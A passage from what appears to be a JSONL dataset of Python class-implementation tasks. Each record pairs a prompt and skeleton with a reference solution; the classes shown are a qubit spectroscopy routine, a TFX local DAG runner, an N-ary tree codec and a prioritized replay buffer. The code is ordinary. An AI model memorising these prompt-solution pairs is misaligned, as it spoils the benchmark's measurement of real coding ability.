self.add_step(QubitSpectroscopy1DStep, f'qubit_spectroscopy_{i + 1}', qb_spec_settings)\n decision_settings = {'qubits': self.qubits}\n self.add_step(self.Decision, f'decision_spectroscopy_{i + 1}', decision_settings)\n\n def add_rerun_qubit_spectroscopy_step(self, index_spectroscopy, index_iteration, qubits):\n \"\"\"Adds a next QubitSpectroscopy1DStep followed by a Decision step Args: index_spectroscopy (int): Index of the spectroscopy whose fit failed. index_iteration (int): Index of the iteration for the spectroscopy with index `index_spectroscopy`. 
qubits (list): List of qubits (QuDev_transmon objects) whose spectroscopy should be run again.\"\"\"\n settings = {'QubitSpectroscopy1D': {'qubits': {}}}\n if self.get_param_value('auto_repetition_settings', default=False):\n previous_qb_spec: QubitSpectroscopy1DStep = self.routine_steps[-1]\n for qb in qubits:\n settings['QubitSpectroscopy1D']['qubits'][qb.name] = {'freq_range': previous_qb_spec.freq_ranges[qb.name] * 2, 'freq_center': previous_qb_spec.freq_centers[qb.name], 'spec_power': previous_qb_spec.spec_powers[qb.name][1], 'pts': previous_qb_spec.pts[qb.name] * 4}\n self.add_step(*[QubitSpectroscopy1DStep, f'qubit_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'settings': settings, 'qubits': qubits}], index=self.current_step_index + 1)\n self.add_step(*[self.Decision, f'decision_spectroscopy_{index_spectroscopy}_repetition_{index_iteration}', {'qubits': qubits}], index=self.current_step_index + 2)\n", "source": "the_stack_v2_python_sparse", "source_path": "pycqed/measurement/calibration/automatic_calibration_routines/adaptive_qubit_spectroscopy.py", "source_repo": "QudevETH/PycQED_py3", "split": "test", "star_events_count": 8} {"blob_id": "39a05543fcc027b0f8ccff1d41cdcf95b12d7ff2", "bodies": ["if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\nsuper().__init__(config)", "tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\nwith telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'local'}):\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n driver_args = data_types.DriverArgs(enable_cache=tfx_pipeline.enable_cache)\n metadata_connection = metadata.Metadata(tfx_pipeline.metadata_connection_config)\n node_launcher = component_launcher_class.create(component=component, pipeline_info=tfx_pipeline.pipeline_info, driver_args=driver_args, metadata_connection=metadata_connection, beam_pipeline_args=tfx_pipeline.beam_pipeline_args, additional_pipeline_args=tfx_pipeline.additional_pipeline_args, component_config=component_config)\n logging.info('Component %s is running.', component.id)\n node_launcher.launch()\n logging.info('Component %s is finished.', component.id)"], "bodies_text": "<|body_start_0|>\n if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\n super().__init__(config)\n<|end_body_0|>\n\n<|body_start_1|>\n tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\n with telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'local'}):\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n driver_args = data_types.DriverArgs(enable_cache=tfx_pipeline.enable_cache)\n metadata_connection = metadata.Metadata(tfx_pipeline.metadata_connection_config)\n node_launcher = component_launcher_class.create(component=component, 
pipeline_info=tfx_pipeline.pipeline_info, driver_args=driver_args, metadata_connection=metadata_connection, beam_pipeline_args=tfx_pipeline.beam_pipeline_args, additional_pipeline_args=tfx_pipeline.additional_pipeline_args, component_config=component_config)\n logging.info('Component %s is running.', component.id)\n node_launcher.launch()\n logging.info('Component %s is finished.', component.id)\n<|end_body_1|>\n", "class_docstring": "Local TFX DAG runner.", "class_name": "LocalDagRunner", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LocalDagRunner:\n \"\"\"Local TFX DAG runner.\"\"\"\n\n def __init__(self, config: Optional[pipeline_config.PipelineConfig]=None):\n \"\"\"Initializes local TFX orchestrator. Args: config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\"\"\"\n <|body_0|>\n\n def run(self, tfx_pipeline: pipeline.Pipeline) -> None:\n \"\"\"Runs given logical pipeline locally. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\n super().__init__(config)\n<|end_body_0|>\n\n<|body_start_1|>\n tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\n with telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'local'}):\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n driver_args = data_types.DriverArgs(enable_cache=tfx_pipeline.enable_cache)\n metadata_connection = metadata.Metadata(tfx_pipeline.metadata_connection_config)\n node_launcher = component_launcher_class.create(component=component, pipeline_info=tfx_pipeline.pipeline_info, driver_args=driver_args, metadata_connection=metadata_connection, beam_pipeline_args=tfx_pipeline.beam_pipeline_args, additional_pipeline_args=tfx_pipeline.additional_pipeline_args, component_config=component_config)\n logging.info('Component %s is running.', component.id)\n node_launcher.launch()\n logging.info('Component %s is finished.', component.id)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000320", "length_bytes": 3897, "license_type": "permissive", "methods": [{"docstring": "Initializes local TFX orchestrator. Args: config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.", "name": "__init__", "signature": "def __init__(self, config: Optional[pipeline_config.PipelineConfig]=None)"}, {"docstring": "Runs given logical pipeline locally. 
Args: tfx_pipeline: Logical pipeline containing pipeline args and components.", "name": "run", "signature": "def run(self, tfx_pipeline: pipeline.Pipeline) -> None"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004096", "prompt": "Implement the Python class `LocalDagRunner` described below.\n\nClass description:\nLocal TFX DAG runner.\n\nMethod signatures and docstrings:\n- def __init__(self, config: Optional[pipeline_config.PipelineConfig]=None): Initializes local TFX orchestrator. Args: config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\n- def run(self, tfx_pipeline: pipeline.Pipeline) -> None: Runs given logical pipeline locally. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.", "prompted_full_text": "Implement the Python class `LocalDagRunner` described below.\n\nClass description:\nLocal TFX DAG runner.\n\nMethod signatures and docstrings:\n- def __init__(self, config: Optional[pipeline_config.PipelineConfig]=None): Initializes local TFX orchestrator. Args: config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\n- def run(self, tfx_pipeline: pipeline.Pipeline) -> None: Runs given logical pipeline locally. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\n\n<|skeleton|>\nclass LocalDagRunner:\n \"\"\"Local TFX DAG runner.\"\"\"\n\n def __init__(self, config: Optional[pipeline_config.PipelineConfig]=None):\n \"\"\"Initializes local TFX orchestrator. Args: config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\"\"\"\n <|body_0|>\n\n def run(self, tfx_pipeline: pipeline.Pipeline) -> None:\n \"\"\"Runs given logical pipeline locally. 
Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\n super().__init__(config)\n<|end_body_0|>\n\n<|body_start_1|>\n tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\n with telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'local'}):\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n driver_args = data_types.DriverArgs(enable_cache=tfx_pipeline.enable_cache)\n metadata_connection = metadata.Metadata(tfx_pipeline.metadata_connection_config)\n node_launcher = component_launcher_class.create(component=component, pipeline_info=tfx_pipeline.pipeline_info, driver_args=driver_args, metadata_connection=metadata_connection, beam_pipeline_args=tfx_pipeline.beam_pipeline_args, additional_pipeline_args=tfx_pipeline.additional_pipeline_args, component_config=component_config)\n logging.info('Component %s is running.', component.id)\n node_launcher.launch()\n logging.info('Component %s is finished.', component.id)\n<|end_body_1|>\n", "revision_id": "1b328504fa08a70388691e4072df76f143631325", "skeleton": "<|skeleton|>\nclass LocalDagRunner:\n \"\"\"Local TFX DAG runner.\"\"\"\n\n def __init__(self, config: Optional[pipeline_config.PipelineConfig]=None):\n \"\"\"Initializes local TFX orchestrator. Args: config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\"\"\"\n <|body_0|>\n\n def run(self, tfx_pipeline: pipeline.Pipeline) -> None:\n \"\"\"Runs given logical pipeline locally. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LocalDagRunner:\n \"\"\"Local TFX DAG runner.\"\"\"\n\n def __init__(self, config: Optional[pipeline_config.PipelineConfig]=None):\n \"\"\"Initializes local TFX orchestrator. Args: config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\"\"\"\n if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\n super().__init__(config)\n\n def run(self, tfx_pipeline: pipeline.Pipeline) -> None:\n \"\"\"Runs given logical pipeline locally. 
Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\"\"\"\n tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\n with telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'local'}):\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n driver_args = data_types.DriverArgs(enable_cache=tfx_pipeline.enable_cache)\n metadata_connection = metadata.Metadata(tfx_pipeline.metadata_connection_config)\n node_launcher = component_launcher_class.create(component=component, pipeline_info=tfx_pipeline.pipeline_info, driver_args=driver_args, metadata_connection=metadata_connection, beam_pipeline_args=tfx_pipeline.beam_pipeline_args, additional_pipeline_args=tfx_pipeline.additional_pipeline_args, component_config=component_config)\n logging.info('Component %s is running.', component.id)\n node_launcher.launch()\n logging.info('Component %s is finished.', component.id)\n", "source": "the_stack_v2_python_sparse", "source_path": "tfx/orchestration/local/legacy/local_dag_runner.py", "source_repo": "tensorflow/tfx", "split": "test", "star_events_count": 2116} {"blob_id": "0303d05288fcc9821ea2cc34833b42ce20c68f68", "bodies": ["def helper(node):\n if not node:\n return ''\n if not node.children:\n return str(node.val)\n res = str(node.val) + '['\n for i in range(len(node.children) - 1):\n res += helper(node.children[i])\n res += ' '\n res += helper(node.children[-1])\n res += ']'\n return res\nstring = helper(root)\nreturn string", "if not data:\n return None\nstart = 0\nwhile start < len(data) and data[start] != '[':\n start += 1\nroot = Node(int(data[:start]), [])\nnew_str = []\ncount = 0\nleft = start + 1\nfor i, char in enumerate(data[start + 1:-1]):\n if char == '[':\n count += 1\n elif char == ']':\n count -= 1\n elif char == ' ':\n if count == 0:\n new_str.append(data[left:i + start + 1])\n left = i + 2 + start\nif data[left:-1] != '':\n new_str.append(data[left:-1])\nfor sub_str in new_str:\n root.children.append(self.deserialize(sub_str))\nreturn root"], "bodies_text": "<|body_start_0|>\n def helper(node):\n if not node:\n return ''\n if not node.children:\n return str(node.val)\n res = str(node.val) + '['\n for i in range(len(node.children) - 1):\n res += helper(node.children[i])\n res += ' '\n res += helper(node.children[-1])\n res += ']'\n return res\n string = helper(root)\n return string\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return None\n start = 0\n while start < len(data) and data[start] != '[':\n start += 1\n root = Node(int(data[:start]), [])\n new_str = []\n count = 0\n left = start + 1\n for i, char in enumerate(data[start + 1:-1]):\n if char == '[':\n count += 1\n elif char == ']':\n count -= 1\n elif char == ' ':\n if count == 0:\n new_str.append(data[left:i + start + 1])\n left = i + 2 + start\n if data[left:-1] != '':\n new_str.append(data[left:-1])\n for sub_str in new_str:\n root.children.append(self.deserialize(sub_str))\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. 
:type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def helper(node):\n if not node:\n return ''\n if not node.children:\n return str(node.val)\n res = str(node.val) + '['\n for i in range(len(node.children) - 1):\n res += helper(node.children[i])\n res += ' '\n res += helper(node.children[-1])\n res += ']'\n return res\n string = helper(root)\n return string\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return None\n start = 0\n while start < len(data) and data[start] != '[':\n start += 1\n root = Node(int(data[:start]), [])\n new_str = []\n count = 0\n left = start + 1\n for i, char in enumerate(data[start + 1:-1]):\n if char == '[':\n count += 1\n elif char == ']':\n count -= 1\n elif char == ' ':\n if count == 0:\n new_str.append(data[left:i + start + 1])\n left = i + 2 + start\n if data[left:-1] != '':\n new_str.append(data[left:-1])\n for sub_str in new_str:\n root.children.append(self.deserialize(sub_str))\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000321", "length_bytes": 1792, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: Node :rtype: str", "name": "serialize", "signature": "def serialize(self, root: 'Node') -> str"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: Node", "name": "deserialize", "signature": "def deserialize(self, data: str) -> 'Node'"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root: 'Node') -> str: Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data: str) -> 'Node': Decodes your encoded data to tree. :type data: str :rtype: Node", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root: 'Node') -> str: Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data: str) -> 'Node': Decodes your encoded data to tree. :type data: str :rtype: Node\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. 
:type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def helper(node):\n if not node:\n return ''\n if not node.children:\n return str(node.val)\n res = str(node.val) + '['\n for i in range(len(node.children) - 1):\n res += helper(node.children[i])\n res += ' '\n res += helper(node.children[-1])\n res += ']'\n return res\n string = helper(root)\n return string\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return None\n start = 0\n while start < len(data) and data[start] != '[':\n start += 1\n root = Node(int(data[:start]), [])\n new_str = []\n count = 0\n left = start + 1\n for i, char in enumerate(data[start + 1:-1]):\n if char == '[':\n count += 1\n elif char == ']':\n count -= 1\n elif char == ' ':\n if count == 0:\n new_str.append(data[left:i + start + 1])\n left = i + 2 + start\n if data[left:-1] != '':\n new_str.append(data[left:-1])\n for sub_str in new_str:\n root.children.append(self.deserialize(sub_str))\n return root\n<|end_body_1|>\n", "revision_id": "90fd00246707b23d60a5d13b5a89d5b5f64ad008", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n def helper(node):\n if not node:\n return ''\n if not node.children:\n return str(node.val)\n res = str(node.val) + '['\n for i in range(len(node.children) - 1):\n res += helper(node.children[i])\n res += ' '\n res += helper(node.children[-1])\n res += ']'\n return res\n string = helper(root)\n return string\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. 
:type data: str :rtype: Node\"\"\"\n if not data:\n return None\n start = 0\n while start < len(data) and data[start] != '[':\n start += 1\n root = Node(int(data[:start]), [])\n new_str = []\n count = 0\n left = start + 1\n for i, char in enumerate(data[start + 1:-1]):\n if char == '[':\n count += 1\n elif char == ']':\n count -= 1\n elif char == ' ':\n if count == 0:\n new_str.append(data[left:i + start + 1])\n left = i + 2 + start\n if data[left:-1] != '':\n new_str.append(data[left:-1])\n for sub_str in new_str:\n root.children.append(self.deserialize(sub_str))\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "python_solution/0428.py", "source_repo": "Dongzi-dq394/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "da870b8b761d45d90f2b88d06d0fd53082368f15", "bodies": ["assert alpha >= 0\nsuper(PrioritizedReplayBuffer, self).__init__(size, batch_size, n_step, gamma)\nself.max_priority, self.tree_ptr = (1.0, 0)\nself.alpha = alpha\ntree_capacity = 1\nwhile tree_capacity < self.max_size:\n tree_capacity *= 2\nself.sum_tree = SumSegmentTree(tree_capacity)\nself.min_tree = MinSegmentTree(tree_capacity)", "transition = super().store(obs, act, rew, next_obs, done)\nif transition:\n self.sum_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.min_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.tree_ptr = (self.tree_ptr + 1) % self.max_size\nreturn transition", "assert len(self) >= self.batch_size\nassert beta > 0\nindices = self._sample_proportional()\nobs = [self.obs_buf[i] for i in indices]\nnext_obs = [self.next_obs_buf[i] for i in indices]\nacts = [self.acts_buf[i] for i in indices]\nrews = [self.rews_buf[i] for i in indices]\ndone = [self.done_buf[i] for i in indices]\nweights = np.array([self._calculate_weight(i, beta) for i in indices])\nreturn PrioritizedExperienceReplayBatch(obs, acts, rews, next_obs, done, weights, indices)", "assert len(indices) == len(priorities)\nfor idx, priority in zip(indices, priorities):\n assert priority > 0\n assert 0 <= idx < len(self)\n self.sum_tree[idx] = priority ** self.alpha\n self.min_tree[idx] = priority ** self.alpha\n self.max_priority = max(self.max_priority, priority)", "indices = []\np_total = self.sum_tree.sum(0, len(self) - 1)\nsegment = p_total / self.batch_size\nfor i in range(self.batch_size):\n a = segment * i\n b = segment * (i + 1)\n upperbound = random.uniform(a, b)\n idx = self.sum_tree.retrieve(upperbound)\n indices.append(idx)\nreturn indices", "p_min = self.min_tree.min() / self.sum_tree.sum()\nmax_weight = (p_min * len(self)) ** (-beta)\np_sample = self.sum_tree[idx] / self.sum_tree.sum()\nweight = (p_sample * len(self)) ** (-beta)\nweight = weight / max_weight\nreturn weight"], "bodies_text": "<|body_start_0|>\n assert alpha >= 0\n super(PrioritizedReplayBuffer, self).__init__(size, batch_size, n_step, gamma)\n self.max_priority, self.tree_ptr = (1.0, 0)\n self.alpha = alpha\n tree_capacity = 1\n while tree_capacity < self.max_size:\n tree_capacity *= 2\n self.sum_tree = SumSegmentTree(tree_capacity)\n self.min_tree = MinSegmentTree(tree_capacity)\n<|end_body_0|>\n\n<|body_start_1|>\n transition = super().store(obs, act, rew, next_obs, done)\n if transition:\n self.sum_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.min_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.tree_ptr = (self.tree_ptr + 1) % self.max_size\n return transition\n<|end_body_1|>\n\n<|body_start_2|>\n assert len(self) >= self.batch_size\n assert beta > 0\n indices = 
self._sample_proportional()\n obs = [self.obs_buf[i] for i in indices]\n next_obs = [self.next_obs_buf[i] for i in indices]\n acts = [self.acts_buf[i] for i in indices]\n rews = [self.rews_buf[i] for i in indices]\n done = [self.done_buf[i] for i in indices]\n weights = np.array([self._calculate_weight(i, beta) for i in indices])\n return PrioritizedExperienceReplayBatch(obs, acts, rews, next_obs, done, weights, indices)\n<|end_body_2|>\n\n<|body_start_3|>\n assert len(indices) == len(priorities)\n for idx, priority in zip(indices, priorities):\n assert priority > 0\n assert 0 <= idx < len(self)\n self.sum_tree[idx] = priority ** self.alpha\n self.min_tree[idx] = priority ** self.alpha\n self.max_priority = max(self.max_priority, priority)\n<|end_body_3|>\n\n<|body_start_4|>\n indices = []\n p_total = self.sum_tree.sum(0, len(self) - 1)\n segment = p_total / self.batch_size\n for i in range(self.batch_size):\n a = segment * i\n b = segment * (i + 1)\n upperbound = random.uniform(a, b)\n idx = self.sum_tree.retrieve(upperbound)\n indices.append(idx)\n return indices\n<|end_body_4|>\n\n<|body_start_5|>\n p_min = self.min_tree.min() / self.sum_tree.sum()\n max_weight = (p_min * len(self)) ** (-beta)\n p_sample = self.sum_tree[idx] / self.sum_tree.sum()\n weight = (p_sample * len(self)) ** (-beta)\n weight = weight / max_weight\n return weight\n<|end_body_5|>\n", "class_docstring": "Prioritized Replay buffer. Attributes: max_priority (float): max priority tree_ptr (int): next index of tree alpha (float): alpha parameter for prioritized replay buffer sum_tree (SumSegmentTree): sum tree for prior min_tree (MinSegmentTree): min tree for min prior to get max weight", "class_name": "PrioritizedReplayBuffer", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PrioritizedReplayBuffer:\n \"\"\"Prioritized Replay buffer. 
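# Hedged aside on the doubling loop in the buffer's __init__ above: segment
# trees index a complete binary tree, so capacity is rounded up to the next
# power of two. tree_capacity is an illustrative stand-in name.
def tree_capacity(max_size: int) -> int:
    cap = 1
    while cap < max_size:
        cap *= 2
    return cap

assert tree_capacity(100) == 128
assert tree_capacity(128) == 128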
Attributes: max_priority (float): max priority tree_ptr (int): next index of tree alpha (float): alpha parameter for prioritized replay buffer sum_tree (SumSegmentTree): sum tree for prior min_tree (MinSegmentTree): min tree for min prior to get max weight\"\"\"\n\n def __init__(self, size: int, batch_size: int=32, alpha: float=0.6, n_step: int=1, gamma: float=0.99):\n \"\"\"Initialization.\"\"\"\n <|body_0|>\n\n def store(self, obs: OdinsynthEnvStep, act: int, rew: float, next_obs: OdinsynthEnvStep, done: bool) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]:\n \"\"\"Store experience and priority.\"\"\"\n <|body_1|>\n\n def sample_batch(self, beta: float=0.4) -> Dict[str, np.ndarray]:\n \"\"\"Sample a batch of experiences.\"\"\"\n <|body_2|>\n\n def update_priorities(self, indices: List[int], priorities: np.ndarray):\n \"\"\"Update priorities of sampled transitions.\"\"\"\n <|body_3|>\n\n def _sample_proportional(self) -> List[int]:\n \"\"\"Sample indices based on proportions.\"\"\"\n <|body_4|>\n\n def _calculate_weight(self, idx: int, beta: float):\n \"\"\"Calculate the weight of the experience at idx.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert alpha >= 0\n super(PrioritizedReplayBuffer, self).__init__(size, batch_size, n_step, gamma)\n self.max_priority, self.tree_ptr = (1.0, 0)\n self.alpha = alpha\n tree_capacity = 1\n while tree_capacity < self.max_size:\n tree_capacity *= 2\n self.sum_tree = SumSegmentTree(tree_capacity)\n self.min_tree = MinSegmentTree(tree_capacity)\n<|end_body_0|>\n\n<|body_start_1|>\n transition = super().store(obs, act, rew, next_obs, done)\n if transition:\n self.sum_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.min_tree[self.tree_ptr] = self.max_priority ** self.alpha\n self.tree_ptr = (self.tree_ptr + 1) % self.max_size\n return transition\n<|end_body_1|>\n\n<|body_start_2|>\n assert len(self) >= self.batch_size\n assert beta > 0\n indices = self._sample_proportional()\n obs = [self.obs_buf[i] for i in indices]\n next_obs = [self.next_obs_buf[i] for i in indices]\n acts = [self.acts_buf[i] for i in indices]\n rews = [self.rews_buf[i] for i in indices]\n done = [self.done_buf[i] for i in indices]\n weights = np.array([self._calculate_weight(i, beta) for i in indices])\n return PrioritizedExperienceReplayBatch(obs, acts, rews, next_obs, done, weights, indices)\n<|end_body_2|>\n\n<|body_start_3|>\n assert len(indices) == len(priorities)\n for idx, priority in zip(indices, priorities):\n assert priority > 0\n assert 0 <= idx < len(self)\n self.sum_tree[idx] = priority ** self.alpha\n self.min_tree[idx] = priority ** self.alpha\n self.max_priority = max(self.max_priority, priority)\n<|end_body_3|>\n\n<|body_start_4|>\n indices = []\n p_total = self.sum_tree.sum(0, len(self) - 1)\n segment = p_total / self.batch_size\n for i in range(self.batch_size):\n a = segment * i\n b = segment * (i + 1)\n upperbound = random.uniform(a, b)\n idx = self.sum_tree.retrieve(upperbound)\n indices.append(idx)\n return indices\n<|end_body_4|>\n\n<|body_start_5|>\n p_min = self.min_tree.min() / self.sum_tree.sum()\n max_weight = (p_min * len(self)) ** (-beta)\n p_sample = self.sum_tree[idx] / self.sum_tree.sum()\n weight = (p_sample * len(self)) ** (-beta)\n weight = weight / max_weight\n return weight\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000322", "length_bytes": 26535, "license_type": "no_license", "methods": [{"docstring": "Initialization.", "name": "__init__", "signature": "def __init__(self, size: int, 
batch_size: int=32, alpha: float=0.6, n_step: int=1, gamma: float=0.99)"}, {"docstring": "Store experience and priority.", "name": "store", "signature": "def store(self, obs: OdinsynthEnvStep, act: int, rew: float, next_obs: OdinsynthEnvStep, done: bool) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]"}, {"docstring": "Sample a batch of experiences.", "name": "sample_batch", "signature": "def sample_batch(self, beta: float=0.4) -> Dict[str, np.ndarray]"}, {"docstring": "Update priorities of sampled transitions.", "name": "update_priorities", "signature": "def update_priorities(self, indices: List[int], priorities: np.ndarray)"}, {"docstring": "Sample indices based on proportions.", "name": "_sample_proportional", "signature": "def _sample_proportional(self) -> List[int]"}, {"docstring": "Calculate the weight of the experience at idx.", "name": "_calculate_weight", "signature": "def _calculate_weight(self, idx: int, beta: float)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_003271", "prompt": "Implement the Python class `PrioritizedReplayBuffer` described below.\n\nClass description:\nPrioritized Replay buffer. Attributes: max_priority (float): max priority tree_ptr (int): next index of tree alpha (float): alpha parameter for prioritized replay buffer sum_tree (SumSegmentTree): sum tree for prior min_tree (MinSegmentTree): min tree for min prior to get max weight\n\nMethod signatures and docstrings:\n- def __init__(self, size: int, batch_size: int=32, alpha: float=0.6, n_step: int=1, gamma: float=0.99): Initialization.\n- def store(self, obs: OdinsynthEnvStep, act: int, rew: float, next_obs: OdinsynthEnvStep, done: bool) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]: Store experience and priority.\n- def sample_batch(self, beta: float=0.4) -> Dict[str, np.ndarray]: Sample a batch of experiences.\n- def update_priorities(self, indices: List[int], priorities: np.ndarray): Update priorities of sampled transitions.\n- def _sample_proportional(self) -> List[int]: Sample indices based on proportions.\n- def _calculate_weight(self, idx: int, beta: float): Calculate the weight of the experience at idx.", "prompted_full_text": "Implement the Python class `PrioritizedReplayBuffer` described below.\n\nClass description:\nPrioritized Replay buffer. Attributes: max_priority (float): max priority tree_ptr (int): next index of tree alpha (float): alpha parameter for prioritized replay buffer sum_tree (SumSegmentTree): sum tree for prior min_tree (MinSegmentTree): min tree for min prior to get max weight\n\nMethod signatures and docstrings:\n- def __init__(self, size: int, batch_size: int=32, alpha: float=0.6, n_step: int=1, gamma: float=0.99): Initialization.\n- def store(self, obs: OdinsynthEnvStep, act: int, rew: float, next_obs: OdinsynthEnvStep, done: bool) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]: Store experience and priority.\n- def sample_batch(self, beta: float=0.4) -> Dict[str, np.ndarray]: Sample a batch of experiences.\n- def update_priorities(self, indices: List[int], priorities: np.ndarray): Update priorities of sampled transitions.\n- def _sample_proportional(self) -> List[int]: Sample indices based on proportions.\n- def _calculate_weight(self, idx: int, beta: float): Calculate the weight of the experience at idx.\n\n<|skeleton|>\nclass PrioritizedReplayBuffer:\n \"\"\"Prioritized Replay 